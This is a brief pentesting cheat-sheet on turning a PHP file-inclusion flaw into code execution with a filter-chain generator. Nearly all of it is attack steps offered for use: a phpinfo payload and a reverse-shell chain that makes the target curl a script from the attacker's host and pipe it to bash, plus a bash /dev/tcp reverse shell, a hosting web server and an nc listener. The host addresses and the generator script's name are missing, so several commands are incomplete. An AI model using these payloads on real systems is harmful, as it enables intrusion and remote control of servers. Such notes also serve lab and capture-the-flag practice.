PHP Filters Chain

Last modified: 2023-04-10



PHP Filter Chain Generator is available so we can use it.

python3 --chain '<?php phpinfo(); ?>'

We only have to do is paste the above generated payload to /?page=<genrated_chain>.

Reverse Shell

First create a shell script named "revshell" in local machine.

bash -i >& /dev/tcp/ 0>&1

Then create a chain using a generator.
Replace the ip address with your own.

# `<?= ?>` is a shorthand for `<?php echo ~ ?>`
python3 --chain '<?= `curl -s -L|bash` ?>'

We need to start a web server that hosts the shell script, and also start a listener for receiving the reverse connection.

# terminal 1
sudo python3 -m http.server 80

# terminal 2
nc -lvnp 4444

Now access to /?page=<generated_chain>. We can get a shell.